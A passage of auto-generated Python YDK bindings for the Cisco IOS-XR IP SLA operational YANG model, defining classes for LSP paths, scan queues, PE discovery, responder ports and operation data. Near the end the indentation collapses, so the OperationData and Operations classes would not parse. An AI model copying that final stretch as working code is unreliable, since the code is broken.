                ('operation_time', YLeaf(YType.uint64, 'operation-time')),
                ('response_time', YLeaf(YType.uint32, 'response-time')),
                ('success_count', YLeaf(YType.uint32, 'success-count')),
                ('failure_count', YLeaf(YType.uint32, 'failure-count')),
            ])
            self.path_index = None
            self.path_status = None
            self.operation_time = None
            self.response_time = None
            self.success_count = None
            self.failure_count = None
            # Instantiate and parent the path-id child container.
            self.path_id = Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths.LpdPath.PathId()
            self.path_id.parent = self
            self._children_name_map["path_id"] = "path-id"
            self._children_yang_names.add("path-id")
            # Path segment carries the key predicate, e.g. lpd-path[path-index='0'].
            self._segment_path = lambda: "lpd-path" + "[path-index='" + str(self.path_index) + "']"

        def __setattr__(self, name, value):
            """Delegate attribute writes to the YDK base machinery for the named leafs."""
            self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths.LpdPath, ['path_index', 'path_status', 'operation_time', 'response_time', 'success_count', 'failure_count'], name, value)

        class PathId(Entity):
            """
            LPD path identifier
            .. attribute:: lsp_selector
            LSP selector
            **type**\: str
            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
            .. attribute:: output_interface
            Output interface
            **type**\: str
            **pattern:** [a\-zA\-Z0\-9./\-]+
            .. attribute:: nexthop_address
            Nexthop address
            **type**\: str
            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
            .. attribute:: downstream_label
            Downstream label stacks
            **type**\: list of int
            **range:** 0..4294967295
            """

            # YANG module prefix and revision this binding was generated from.
            _prefix = 'man-ipsla-oper'
            _revision = '2015-11-09'

            def __init__(self):
                """Register this leaf-only 'path-id' container; downstream-label is a leaf-list."""
                super(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths.LpdPath.PathId, self).__init__()
                self.yang_name = "path-id"
                self.yang_parent_name = "lpd-path"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_container_classes = OrderedDict([])
                self._child_list_classes = OrderedDict([])
                # Leaf descriptors; downstream-label uses YLeafList (YANG leaf-list).
                self._leafs = OrderedDict([
                    ('lsp_selector', YLeaf(YType.str, 'lsp-selector')),
                    ('output_interface', YLeaf(YType.str, 'output-interface')),
                    ('nexthop_address', YLeaf(YType.str, 'nexthop-address')),
                    ('downstream_label', YLeafList(YType.uint32, 'downstream-label')),
                ])
                self.lsp_selector = None
                self.output_interface = None
                self.nexthop_address = None
                self.downstream_label = []
                self._segment_path = lambda: "path-id"

            def __setattr__(self, name, value):
                """Delegate attribute writes to the YDK base machinery for the named leafs."""
                self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths.LpdPath.PathId, ['lsp_selector', 'output_interface', 'nexthop_address', 'downstream_label'], name, value)
class ScanQueues(Entity):
    """
    List of Scan Queue entries in MPLS LSP
    Monitor
    .. attribute:: scan_queue
    Provider Edge(PE) addition or deletion requests in Scan Queue
    **type**\: list of :py:class:`ScanQueue <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor.ScanQueues.ScanQueue>`
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        """Register the 'scan-queue' child list; this container has no leafs of its own."""
        super(Ipsla.MplsData.LspMonitors.LspMonitor.ScanQueues, self).__init__()
        self.yang_name = "scan-queues"
        self.yang_parent_name = "lsp-monitor"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([("scan-queue", ("scan_queue", Ipsla.MplsData.LspMonitors.LspMonitor.ScanQueues.ScanQueue))])
        self._leafs = OrderedDict()
        # YList holds zero or more ScanQueue entries keyed by address.
        self.scan_queue = YList(self)
        self._segment_path = lambda: "scan-queues"

    def __setattr__(self, name, value):
        """Delegate attribute writes to the YDK base machinery (no leafs here)."""
        self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor.ScanQueues, [], name, value)

    class ScanQueue(Entity):
        """
        Provider Edge(PE) addition or deletion
        requests in Scan Queue
        .. attribute:: address (key)
        Nexthop Address
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        .. attribute:: target_address
        PE target address
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        .. attribute:: target_mask
        PE target mask length
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: entry
        PE addition or deletion
        **type**\: :py:class:`IpslaMplsAddDeleteEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaMplsAddDeleteEnum>`
        """

        # YANG module prefix and revision this binding was generated from.
        _prefix = 'man-ipsla-oper'
        _revision = '2015-11-09'

        def __init__(self):
            """Build this 'scan-queue' list entry: key leaf 'address' plus target/entry leafs."""
            super(Ipsla.MplsData.LspMonitors.LspMonitor.ScanQueues.ScanQueue, self).__init__()
            self.yang_name = "scan-queue"
            self.yang_parent_name = "scan-queues"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            # 'address' is the YANG list key for this entry.
            self.ylist_key_names = ['address']
            self._child_container_classes = OrderedDict([])
            self._child_list_classes = OrderedDict([])
            # Leaf descriptors: python attribute name -> YLeaf(yang type, yang name).
            self._leafs = OrderedDict([
                ('address', YLeaf(YType.str, 'address')),
                ('target_address', YLeaf(YType.str, 'target-address')),
                ('target_mask', YLeaf(YType.uint32, 'target-mask')),
                ('entry', YLeaf(YType.enumeration, 'entry')),
            ])
            self.address = None
            self.target_address = None
            self.target_mask = None
            self.entry = None
            # Path segment carries the key predicate, e.g. scan-queue[address='10.0.0.1'].
            self._segment_path = lambda: "scan-queue" + "[address='" + str(self.address) + "']"

        def __setattr__(self, name, value):
            """Delegate attribute writes to the YDK base machinery for the named leafs."""
            self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor.ScanQueues.ScanQueue, ['address', 'target_address', 'target_mask', 'entry'], name, value)
class Discovery(Entity):
    """
    Provider Edge(PE) discovery operational data
    .. attribute:: vpn
    L3 VPN PE discovery operational data
    **type**\: :py:class:`Vpn <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.Discovery.Vpn>`
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        """Register the single 'vpn' child container; this node has no list ancestor, so an absolute path is provided."""
        super(Ipsla.MplsData.Discovery, self).__init__()
        self.yang_name = "discovery"
        self.yang_parent_name = "mpls-data"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([("vpn", ("vpn", Ipsla.MplsData.Discovery.Vpn))])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict()
        # Instantiate and parent the vpn child container.
        self.vpn = Ipsla.MplsData.Discovery.Vpn()
        self.vpn.parent = self
        self._children_name_map["vpn"] = "vpn"
        self._children_yang_names.add("vpn")
        self._segment_path = lambda: "discovery"
        self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/mpls-data/%s" % self._segment_path()

    class Vpn(Entity):
        """
        L3 VPN PE discovery operational data
        .. attribute:: state
        Operational state of PE discovery
        **type**\: :py:class:`State <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.Discovery.Vpn.State>`
        .. attribute:: nexthops
        List of nexthop addresses for remote PE routers
        **type**\: :py:class:`Nexthops <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.Discovery.Vpn.Nexthops>`
        """

        # YANG module prefix and revision this binding was generated from.
        _prefix = 'man-ipsla-oper'
        _revision = '2015-11-09'

        def __init__(self):
            """Register the 'state' and 'nexthops' child containers."""
            super(Ipsla.MplsData.Discovery.Vpn, self).__init__()
            self.yang_name = "vpn"
            self.yang_parent_name = "discovery"
            self.is_top_level_class = False
            self.has_list_ancestor = False
            self.ylist_key_names = []
            self._child_container_classes = OrderedDict([("state", ("state", Ipsla.MplsData.Discovery.Vpn.State)), ("nexthops", ("nexthops", Ipsla.MplsData.Discovery.Vpn.Nexthops))])
            self._child_list_classes = OrderedDict([])
            self._leafs = OrderedDict()
            # Instantiate and parent both child containers.
            self.state = Ipsla.MplsData.Discovery.Vpn.State()
            self.state.parent = self
            self._children_name_map["state"] = "state"
            self._children_yang_names.add("state")
            self.nexthops = Ipsla.MplsData.Discovery.Vpn.Nexthops()
            self.nexthops.parent = self
            self._children_name_map["nexthops"] = "nexthops"
            self._children_yang_names.add("nexthops")
            self._segment_path = lambda: "vpn"
            self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/mpls-data/discovery/%s" % self._segment_path()

        class State(Entity):
            """
            Operational state of PE discovery
            .. attribute:: refresh_remaining
            Number of seconds left before next refresh
            **type**\: int
            **range:** 0..4294967295
            **units**\: second
            """

            # YANG module prefix and revision this binding was generated from.
            _prefix = 'man-ipsla-oper'
            _revision = '2015-11-09'

            def __init__(self):
                """Register this leaf-only 'state' container (single uint32 leaf)."""
                super(Ipsla.MplsData.Discovery.Vpn.State, self).__init__()
                self.yang_name = "state"
                self.yang_parent_name = "vpn"
                self.is_top_level_class = False
                self.has_list_ancestor = False
                self.ylist_key_names = []
                self._child_container_classes = OrderedDict([])
                self._child_list_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('refresh_remaining', YLeaf(YType.uint32, 'refresh-remaining')),
                ])
                self.refresh_remaining = None
                self._segment_path = lambda: "state"
                self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/mpls-data/discovery/vpn/%s" % self._segment_path()

            def __setattr__(self, name, value):
                """Delegate attribute writes to the YDK base machinery for the named leaf."""
                self._perform_setattr(Ipsla.MplsData.Discovery.Vpn.State, ['refresh_remaining'], name, value)

        class Nexthops(Entity):
            """
            List of nexthop addresses for remote PE
            routers
            .. attribute:: nexthop
            Nexthop address for remote PE router
            **type**\: list of :py:class:`Nexthop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop>`
            """

            # YANG module prefix and revision this binding was generated from.
            _prefix = 'man-ipsla-oper'
            _revision = '2015-11-09'

            def __init__(self):
                """Register the 'nexthop' child list; this container has no leafs of its own."""
                super(Ipsla.MplsData.Discovery.Vpn.Nexthops, self).__init__()
                self.yang_name = "nexthops"
                self.yang_parent_name = "vpn"
                self.is_top_level_class = False
                self.has_list_ancestor = False
                self.ylist_key_names = []
                self._child_container_classes = OrderedDict([])
                self._child_list_classes = OrderedDict([("nexthop", ("nexthop", Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop))])
                self._leafs = OrderedDict()
                # YList holds zero or more Nexthop entries keyed by address.
                self.nexthop = YList(self)
                self._segment_path = lambda: "nexthops"
                self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/mpls-data/discovery/vpn/%s" % self._segment_path()

            def __setattr__(self, name, value):
                """Delegate attribute writes to the YDK base machinery (no leafs here)."""
                self._perform_setattr(Ipsla.MplsData.Discovery.Vpn.Nexthops, [], name, value)

            class Nexthop(Entity):
                """
                Nexthop address for remote PE router
                .. attribute:: address (key)
                Nexthop Address
                **type**\: str
                **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
                .. attribute:: vrfs
                List of VRFs for the nexthop address
                **type**\: :py:class:`Vrfs <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Vrfs>`
                .. attribute:: prefix
                Prefix of the nexthop address
                **type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Prefix>`
                """

                # YANG module prefix and revision this binding was generated from.
                _prefix = 'man-ipsla-oper'
                _revision = '2015-11-09'

                def __init__(self):
                    """Build this 'nexthop' list entry: key leaf 'address' plus vrfs/prefix children."""
                    super(Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop, self).__init__()
                    self.yang_name = "nexthop"
                    self.yang_parent_name = "nexthops"
                    self.is_top_level_class = False
                    self.has_list_ancestor = False
                    # 'address' is the YANG list key for this entry.
                    self.ylist_key_names = ['address']
                    self._child_container_classes = OrderedDict([("vrfs", ("vrfs", Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Vrfs)), ("prefix", ("prefix", Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Prefix))])
                    self._child_list_classes = OrderedDict([])
                    self._leafs = OrderedDict([
                        ('address', YLeaf(YType.str, 'address')),
                    ])
                    self.address = None
                    # Instantiate and parent the child containers.
                    self.vrfs = Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Vrfs()
                    self.vrfs.parent = self
                    self._children_name_map["vrfs"] = "vrfs"
                    self._children_yang_names.add("vrfs")
                    self.prefix = Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Prefix()
                    self.prefix.parent = self
                    self._children_name_map["prefix"] = "prefix"
                    self._children_yang_names.add("prefix")
                    # Path segment carries the key predicate, e.g. nexthop[address='10.0.0.1'].
                    self._segment_path = lambda: "nexthop" + "[address='" + str(self.address) + "']"
                    self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/mpls-data/discovery/vpn/nexthops/%s" % self._segment_path()

                def __setattr__(self, name, value):
                    """Delegate attribute writes to the YDK base machinery for the key leaf."""
                    self._perform_setattr(Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop, ['address'], name, value)

                class Vrfs(Entity):
                    """
                    List of VRFs for the nexthop address
                    .. attribute:: vrf
                    VRF information of the nexthop address
                    **type**\: list of :py:class:`Vrf <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Vrfs.Vrf>`
                    """

                    # YANG module prefix and revision this binding was generated from.
                    _prefix = 'man-ipsla-oper'
                    _revision = '2015-11-09'

                    def __init__(self):
                        """Register the 'vrf' child list; this container has no leafs of its own."""
                        super(Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Vrfs, self).__init__()
                        self.yang_name = "vrfs"
                        self.yang_parent_name = "nexthop"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_container_classes = OrderedDict([])
                        self._child_list_classes = OrderedDict([("vrf", ("vrf", Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Vrfs.Vrf))])
                        self._leafs = OrderedDict()
                        # YList holds zero or more Vrf entries keyed by vrf-name.
                        self.vrf = YList(self)
                        self._segment_path = lambda: "vrfs"

                    def __setattr__(self, name, value):
                        """Delegate attribute writes to the YDK base machinery (no leafs here)."""
                        self._perform_setattr(Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Vrfs, [], name, value)

                    class Vrf(Entity):
                        """
                        VRF information of the nexthop address
                        .. attribute:: vrf_name (key)
                        VRF Name
                        **type**\: str
                        **length:** 1..32
                        .. attribute:: prefix_count
                        Number of prefixes in VRF
                        **type**\: int
                        **range:** 0..4294967295
                        """

                        # YANG module prefix and revision this binding was generated from.
                        _prefix = 'man-ipsla-oper'
                        _revision = '2015-11-09'

                        def __init__(self):
                            """Build this 'vrf' list entry: key leaf 'vrf_name' plus prefix-count leaf."""
                            super(Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Vrfs.Vrf, self).__init__()
                            self.yang_name = "vrf"
                            self.yang_parent_name = "vrfs"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            # 'vrf_name' is the YANG list key for this entry.
                            self.ylist_key_names = ['vrf_name']
                            self._child_container_classes = OrderedDict([])
                            self._child_list_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('vrf_name', YLeaf(YType.str, 'vrf-name')),
                                ('prefix_count', YLeaf(YType.uint32, 'prefix-count')),
                            ])
                            self.vrf_name = None
                            self.prefix_count = None
                            # Path segment carries the key predicate, e.g. vrf[vrf-name='default'].
                            self._segment_path = lambda: "vrf" + "[vrf-name='" + str(self.vrf_name) + "']"

                        def __setattr__(self, name, value):
                            """Delegate attribute writes to the YDK base machinery for the named leafs."""
                            self._perform_setattr(Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Vrfs.Vrf, ['vrf_name', 'prefix_count'], name, value)

                class Prefix(Entity):
                    """
                    Prefix of the nexthop address
                    .. attribute:: target_address
                    PE target address
                    **type**\: str
                    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
                    .. attribute:: target_mask
                    PE target mask length
                    **type**\: int
                    **range:** 0..4294967295
                    """

                    # YANG module prefix and revision this binding was generated from.
                    _prefix = 'man-ipsla-oper'
                    _revision = '2015-11-09'

                    def __init__(self):
                        """Register this leaf-only 'prefix' container (target address/mask leafs)."""
                        super(Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Prefix, self).__init__()
                        self.yang_name = "prefix"
                        self.yang_parent_name = "nexthop"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_container_classes = OrderedDict([])
                        self._child_list_classes = OrderedDict([])
                        self._leafs = OrderedDict([
                            ('target_address', YLeaf(YType.str, 'target-address')),
                            ('target_mask', YLeaf(YType.uint32, 'target-mask')),
                        ])
                        self.target_address = None
                        self.target_mask = None
                        self._segment_path = lambda: "prefix"

                    def __setattr__(self, name, value):
                        """Delegate attribute writes to the YDK base machinery for the named leafs."""
                        self._perform_setattr(Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Prefix, ['target_address', 'target_mask'], name, value)
class Responder(Entity):
    """
    Data from responder probe handling
    .. attribute:: ports
    Statistics maintained by responder
    **type**\: :py:class:`Ports <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.Responder.Ports>`
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        """Register the single 'ports' child container under the top-level ipsla node."""
        super(Ipsla.Responder, self).__init__()
        self.yang_name = "responder"
        self.yang_parent_name = "ipsla"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([("ports", ("ports", Ipsla.Responder.Ports))])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict()
        # Instantiate and parent the ports child container.
        self.ports = Ipsla.Responder.Ports()
        self.ports.parent = self
        self._children_name_map["ports"] = "ports"
        self._children_yang_names.add("ports")
        self._segment_path = lambda: "responder"
        self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/%s" % self._segment_path()

    class Ports(Entity):
        """
        Statistics maintained by responder
        .. attribute:: port
        Port data
        **type**\: list of :py:class:`Port <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.Responder.Ports.Port>`
        """

        # YANG module prefix and revision this binding was generated from.
        _prefix = 'man-ipsla-oper'
        _revision = '2015-11-09'

        def __init__(self):
            """Register the 'port' child list; this container has no leafs of its own."""
            super(Ipsla.Responder.Ports, self).__init__()
            self.yang_name = "ports"
            self.yang_parent_name = "responder"
            self.is_top_level_class = False
            self.has_list_ancestor = False
            self.ylist_key_names = []
            self._child_container_classes = OrderedDict([])
            self._child_list_classes = OrderedDict([("port", ("port", Ipsla.Responder.Ports.Port))])
            self._leafs = OrderedDict()
            # YList holds zero or more Port entries keyed by port number.
            self.port = YList(self)
            self._segment_path = lambda: "ports"
            self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/responder/%s" % self._segment_path()

        def __setattr__(self, name, value):
            """Delegate attribute writes to the YDK base machinery (no leafs here)."""
            self._perform_setattr(Ipsla.Responder.Ports, [], name, value)

        class Port(Entity):
            """
            Port data
            .. attribute:: port (key)
            Port
            **type**\: int
            **range:** 0..65535
            .. attribute:: port_xr
            Port on which Responder is listening
            **type**\: int
            **range:** 0..65535
            .. attribute:: local_address
            IP address of Responder
            **type**\: str
            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
            .. attribute:: num_probes
            Number of probes received from remote end
            **type**\: int
            **range:** 0..4294967295
            .. attribute:: ctrl_probes
            Number of control probes received from remote end
            **type**\: int
            **range:** 0..4294967295
            .. attribute:: permanent
            Port type if this is permanent or dynamic port
            **type**\: bool
            .. attribute:: discard_on
            Current discard socket option flag for the port
            **type**\: bool
            .. attribute:: pd_time_stamp_failed
            PD Timestamp failure
            **type**\: bool
            .. attribute:: is_ipsla
            IPSLA or TWAMP protocol
            **type**\: bool
            .. attribute:: drop_counter
            Drop counter for the Responder port
            **type**\: int
            **range:** 0..4294967295
            .. attribute:: socket
            Socket
            **type**\: int
            **range:** \-2147483648..2147483647
            .. attribute:: sender
            List of senders
            **type**\: list of :py:class:`Sender <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.Responder.Ports.Port.Sender>`
            """

            # YANG module prefix and revision this binding was generated from.
            _prefix = 'man-ipsla-oper'
            _revision = '2015-11-09'

            def __init__(self):
                """Build this 'port' list entry: key leaf 'port', stats leafs, and the sender child list."""
                super(Ipsla.Responder.Ports.Port, self).__init__()
                self.yang_name = "port"
                self.yang_parent_name = "ports"
                self.is_top_level_class = False
                self.has_list_ancestor = False
                # 'port' is the YANG list key for this entry.
                self.ylist_key_names = ['port']
                self._child_container_classes = OrderedDict([])
                self._child_list_classes = OrderedDict([("sender", ("sender", Ipsla.Responder.Ports.Port.Sender))])
                # Leaf descriptors: python attribute name -> YLeaf(yang type, yang name).
                self._leafs = OrderedDict([
                    ('port', YLeaf(YType.uint16, 'port')),
                    ('port_xr', YLeaf(YType.uint16, 'port-xr')),
                    ('local_address', YLeaf(YType.str, 'local-address')),
                    ('num_probes', YLeaf(YType.uint32, 'num-probes')),
                    ('ctrl_probes', YLeaf(YType.uint32, 'ctrl-probes')),
                    ('permanent', YLeaf(YType.boolean, 'permanent')),
                    ('discard_on', YLeaf(YType.boolean, 'discard-on')),
                    ('pd_time_stamp_failed', YLeaf(YType.boolean, 'pd-time-stamp-failed')),
                    ('is_ipsla', YLeaf(YType.boolean, 'is-ipsla')),
                    ('drop_counter', YLeaf(YType.uint32, 'drop-counter')),
                    ('socket', YLeaf(YType.int32, 'socket')),
                ])
                self.port = None
                self.port_xr = None
                self.local_address = None
                self.num_probes = None
                self.ctrl_probes = None
                self.permanent = None
                self.discard_on = None
                self.pd_time_stamp_failed = None
                self.is_ipsla = None
                self.drop_counter = None
                self.socket = None
                # YList holds zero or more Sender entries.
                self.sender = YList(self)
                # Path segment carries the key predicate, e.g. port[port='5000'].
                self._segment_path = lambda: "port" + "[port='" + str(self.port) + "']"
                self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/responder/ports/%s" % self._segment_path()

            def __setattr__(self, name, value):
                """Delegate attribute writes to the YDK base machinery for the named leafs."""
                self._perform_setattr(Ipsla.Responder.Ports.Port, ['port', 'port_xr', 'local_address', 'num_probes', 'ctrl_probes', 'permanent', 'discard_on', 'pd_time_stamp_failed', 'is_ipsla', 'drop_counter', 'socket'], name, value)

            class Sender(Entity):
                """
                List of senders
                .. attribute:: ip_address
                IP address of Sender
                **type**\: int
                **range:** 0..4294967295
                .. attribute:: port
                Port on which Sender is sending
                **type**\: int
                **range:** 0..65535
                .. attribute:: last_recv_time
                Last received time
                **type**\: int
                **range:** 0..18446744073709551615
                """

                # YANG module prefix and revision this binding was generated from.
                _prefix = 'man-ipsla-oper'
                _revision = '2015-11-09'

                def __init__(self):
                    """Register this leaf-only 'sender' list entry (keyless list in the model)."""
                    super(Ipsla.Responder.Ports.Port.Sender, self).__init__()
                    self.yang_name = "sender"
                    self.yang_parent_name = "port"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_container_classes = OrderedDict([])
                    self._child_list_classes = OrderedDict([])
                    self._leafs = OrderedDict([
                        ('ip_address', YLeaf(YType.uint32, 'ip-address')),
                        ('port', YLeaf(YType.uint16, 'port')),
                        ('last_recv_time', YLeaf(YType.uint64, 'last-recv-time')),
                    ])
                    self.ip_address = None
                    self.port = None
                    self.last_recv_time = None
                    self._segment_path = lambda: "sender"

                def __setattr__(self, name, value):
                    """Delegate attribute writes to the YDK base machinery for the named leafs."""
                    self._perform_setattr(Ipsla.Responder.Ports.Port.Sender, ['ip_address', 'port', 'last_recv_time'], name, value)
class OperationData(Entity):
"""
Operations data
.. attribute:: operations
Configured operations
**type**\: :py:class:`Operations <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Register the single 'operations' child container under operation-data."""
    super(Ipsla.OperationData, self).__init__()
    # YANG node identity within the generated model tree.
    self.yang_name = "operation-data"
    self.yang_parent_name = "ipsla"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = []
    self._child_container_classes = OrderedDict([("operations", ("operations", Ipsla.OperationData.Operations))])
    self._child_list_classes = OrderedDict([])
    self._leafs = OrderedDict()
    # Instantiate and parent the operations child container.
    self.operations = Ipsla.OperationData.Operations()
    self.operations.parent = self
    self._children_name_map["operations"] = "operations"
    self._children_yang_names.add("operations")
    self._segment_path = lambda: "operation-data"
    self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/%s" % self._segment_path()
class Operations(Entity):
"""
Configured operations
.. attribute:: operation_
Operational data for an operation
**type**\: list of :py:class:`Operation <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Register the 'operation' child list; note the python attribute is 'operation_' (trailing underscore)."""
    super(Ipsla.OperationData.Operations, self).__init__()
    self.yang_name = "operations"
    self.yang_parent_name = "operation-data"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = []
    self._child_container_classes = OrderedDict([])
    # YANG name 'operation' maps to python attribute 'operation_'.
    self._child_list_classes = OrderedDict([("operation", ("operation_", Ipsla.OperationData.Operations.Operation))])
    self._leafs = OrderedDict()
    self.operation_ = YList(self)
    self._segment_path = lambda: "operations"
    self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/operation-data/%s" % self._segment_path()
def __setattr__(self, name, value):
    """Delegate attribute writes to the YDK base machinery (no leafs here)."""
    self._perform_setattr(Ipsla.OperationData.Operations, [], name, value)
class Operation(Entity):
"""
Operational data for an operation
.. attribute:: operation_id (key)
Operation ID
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: common
Common data for all operation types
**type**\: :py:class:`Common <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Common>`
.. attribute:: lpd
LPD operational data of MPLS LSP group operation
**type**\: :py:class:`Lpd <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd>`
.. attribute:: history
Historical data for an operation
**type**\: :py:class:`History <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History>`
.. attribute:: statistics
Statistics collected for an operation
**type**\: :py:class:`Statistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build this 'operation' list entry: key leaf and common/lpd/history/statistics children."""
    super(Ipsla.OperationData.Operations.Operation, self).__init__()
    # YANG node identity within the generated model tree.
    self.yang_name = "operation"
    self.yang_parent_name = "operations"
    self.is_top_level_class = False
    self.has_list_ancestor = False
